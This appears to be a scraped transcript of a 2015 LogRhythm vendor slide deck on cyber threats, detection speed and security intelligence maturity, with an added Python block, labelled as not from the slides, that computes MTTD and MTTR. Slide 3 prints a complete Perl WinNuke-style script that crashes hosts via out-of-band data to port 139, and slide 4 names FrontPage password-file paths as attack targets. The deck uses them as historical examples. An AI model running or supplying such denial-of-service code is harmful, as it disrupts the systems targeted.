Published by Berniece Cooper. Modified over 8 years ago.
1 | Company Confidential The Modern Cyber Threat Pandemic Cameron Erens LogRhythm
2 | Company Confidential When Times Were Simpler
3 | Company Confidential Early Attacks

#!/usr/bin/perl
# Slide example of a 1990s-era "nuke": out-of-band (OOB) TCP data sent to NetBIOS port 139
use strict;
use Socket;
my($h,$p,$in_addr,$proto,$addr);
$h = "$ARGV[0]";
$p = 139 if (!$ARGV[1]);
if (!$h) { print "A hostname must be provided. Ex: www.microsoft.com\n"; }
$in_addr = (gethostbyname($h))[4];
$addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;
connect(S,$addr) or die $!;
select S; $| = 1; select STDOUT;
print "Nuking: $h:$p\n";
send S,"Sucker",MSG_OOB;
print "Nuked!\n";
close S;
4 | Company Confidential Early Attacks
\_vti_pvt\
 o Administrators.pwd
 o Authors.pwd
5 | Company Confidential Fast forward to 2015
6 | Company Confidential The Economist, November 2015 “Attackers will still get in…the only safe assumption is that your network is breached, and to make sure that you deal with intruders promptly—not after the 200-odd days which it typically takes. Many networks have no means of detecting a breach at all.”
7 | Company Confidential Attackers Are Getting In
71% of surveyed firms were compromised by a successful cyber-attack in 2014 (The CyberEdge Group, 2015 Cyberthreat Defense Report) (1)
“There are two kinds of big companies in the United States: those who've been hacked by the Chinese and those who don't know they've been hacked by the Chinese.” – James Comey, Director FBI, October 5, 2014
Note 1. Survey includes 624 IT security professionals from North America and Europe representing organizations with more than 500 global employees
8 | Company Confidential The Expanding Cyber Threat
Motive: Political, Ideological, Criminal
9 | Company Confidential Ever Increasing Cyber Risk
[Word cloud of threat types: Inappropriate Network Use, Zero Day Attacks, Credit Card Theft, Compliance Violations, Custom Malware, Insider Threats, Malware, Phishing, Breach, Intrusion, Fraud, State Sponsored Attacks, Privilege Account Abuse, Spear Phishing, Denial of Service, Compromised Endpoints, Brute Forcing, Unintended Disclosure, Trojan Horses, MiTM Attacks, Ransomware, Payment Card Fraud, Social Engineering, Data Exfiltration, Whaling, Hijacking, Keyloggers]
Security incidents per year (Source: PwC’s The Global State of Information Security Survey 2015): 2009: 3.4 million; 2010: 9.4 million; 2011: 22.7 million; 2012: 24.9 million; 2013: 28.9 million; 2014: 42.8 million. 66% growth in security incidents.
10 | Company Confidential Damaging Data Breaches
11 | Company Confidential Big Data Analytics Can Best Detect These Threats
Prevention-centric approaches can stop common threats. However, advanced threats:
 o Require a broader view to recognize
 o Only emerge over time
 o Get lost in the noise
A New Security Approach is Required. An Excellent Security Intelligence Platform Delivers:
 o Big Data analytics to identify advanced threats
 o Qualified and prioritized detection, reducing noise
 o Incident response workflow orchestration and automation
 o Capabilities to prevent high-impact breaches & damaging cyber incidents
12 | Company Confidential Prevention-Centric Approaches Are Insufficient
Prevention-Centric Approaches (Firewalls, Intrusion Prevention Systems, Anti-Virus/Malware, Sandboxing) address Preventable Threats: Previously Seen, Signature-Based, Static, One-Dimensional.
Modern Cyber Threats are: Advanced, Stealthy, Persistent, Dynamic, Multi-Dimensional.
205: Median number of days that companies were compromised before detection of threat (Mandiant M-Trends 2015)
13 | Company Confidential Prevention-Centric is Obsolete “Advanced targeted attacks make prevention-centric strategies obsolete. Securing enterprises in 2020 will require a shift to information and people-centric security strategies, combined with pervasive internal monitoring and sharing of security intelligence.” “By 2020, 60% of enterprise information security budgets will be allocated for rapid detection and response approaches up from less than 10% in 2013.” - Neil MacDonald,
14 | Company Confidential Faster Detection & Response Reduces Risk
[Chart: MTTD & MTTR on a timeframe axis from Months, Weeks, Days, Hours to Minutes, running from High Vulnerability / Exposed to Threats to Low Vulnerability / Resilient to Threats]
MEAN-TIME-TO-DETECT (MTTD): The average time it takes to recognize a threat requiring further analysis and response efforts.
MEAN-TIME-TO-RESPOND (MTTR): The average time it takes to respond and ultimately resolve the incident.
As organizations improve their ability to quickly detect and respond to threats, the risk of experiencing a damaging breach is greatly reduced.
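As an added illustration (not code from the slides or from LogRhythm), the following Python computes MTTD and MTTR from incident records exactly as the slide defines them and maps the results onto the slide's timeframe scale; the incident records and the bucket thresholds are constructed assumptions, and the still-open incident shows the edge case that counts toward MTTD but not MTTR.

```python
from datetime import datetime, timedelta

# Constructed sample incidents (not from the slides): when the compromise began,
# when it was recognised as a threat needing analysis and response, and when it
# was resolved (None while still open).
INCIDENTS = [
    {"id": "INC-1", "compromised": "2015-01-01T08:00",
     "detected": "2015-01-01T09:30", "resolved": "2015-01-01T13:30"},
    {"id": "INC-2", "compromised": "2015-02-01T00:00",
     "detected": "2015-03-15T00:00", "resolved": "2015-03-18T00:00"},
    {"id": "INC-3", "compromised": "2015-04-10T12:00",
     "detected": "2015-04-12T12:00", "resolved": None},  # detected, still open
]

def _ts(value):
    return datetime.fromisoformat(value)

def _average(deltas):
    # statistics.mean() rejects timedelta values, so average by hand
    return sum(deltas, timedelta()) / len(deltas)

def mean_time_to_detect(incidents):
    """MTTD per the slide: average time from compromise to recognition.
    Open incidents still count, since they have been detected."""
    return _average([_ts(i["detected"]) - _ts(i["compromised"]) for i in incidents])

def mean_time_to_respond(incidents):
    """MTTR per the slide: average time from detection to resolution.
    Only resolved incidents have one; None if nothing is resolved yet."""
    closed = [i for i in incidents if i["resolved"] is not None]
    if not closed:
        return None
    return _average([_ts(i["resolved"]) - _ts(i["detected"]) for i in closed])

def timeframe(delta):
    """Bucket a duration onto the slide's scale (thresholds are an assumption)."""
    hours = delta.total_seconds() / 3600
    if hours < 1:
        return "minutes"
    if hours < 24:
        return "hours"
    if hours < 24 * 7:
        return "days"
    if hours < 24 * 30:
        return "weeks"
    return "months"

if __name__ == "__main__":
    mttd, mttr = mean_time_to_detect(INCIDENTS), mean_time_to_respond(INCIDENTS)
    print(f"MTTD {mttd} -> {timeframe(mttd)}; MTTR {mttr} -> {timeframe(mttr)}")
```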
15 | Company Confidential Data Exfiltration Can Be Avoided
Advanced threats take their time and leverage the holistic attack surface. Early neutralization = no damaging cyber incident or data breach.
[Attack progression diagram: Reconnaissance, Initial Compromise, Command & Control, Lateral Movement, Target Attainment, Exfiltration / Corruption / Disruption]
16 | Company Confidential Vigilance Requires Visibility at Every Vector
[Diagram: the Holistic Attack Surface spans User, Network and Endpoint]
17 | Company Confidential Security Intelligence Platform
Threat Lifecycle Management: End-to-End Detection & Response Workflow
TIME TO DETECT
 o Collect & Generate (example sources): Forensic Sensor Data, Security Event Data, Log & Machine Data
 o Detect & Prioritize: Machine Analytics, User Analytics
 o Qualify: Assess threat to determine risk and whether full investigation is necessary
TIME TO RESPOND
 o Investigate: Analyze threat to determine nature and extent of the incident
 o Neutralize: Implement countermeasures to mitigate threat and associated risk
 o Recover: Cleanup, Report, Review, Adapt
18 | Company Confidential Delivering a Path to Success
Security Intelligence Maturity Levels:
 o Level 0: Blind
 o Level 1: Minimally Compliant
 o Level 2: Securely Compliant
 o Level 3: Vigilant
 o Level 4: Resilient
[Chart: MEAN-TIME-TO-DETECT (MTTD) and MEAN-TIME-TO-RESPOND (MTTR) timeframe (Months, Weeks, Days, Hours, Minutes) against Level 0 through Level 4, from Exposed to Threats to Resilient to Threats]
Greater threat resiliency is achieved at higher levels of security intelligence maturity.
19 | Company Confidential Market Leadership Certifications & Validations Industry Awards Company Awards Company of the Year Industry Analysts
20 | Company Confidential Cameron.Erens@logrhythm.com THANK YOU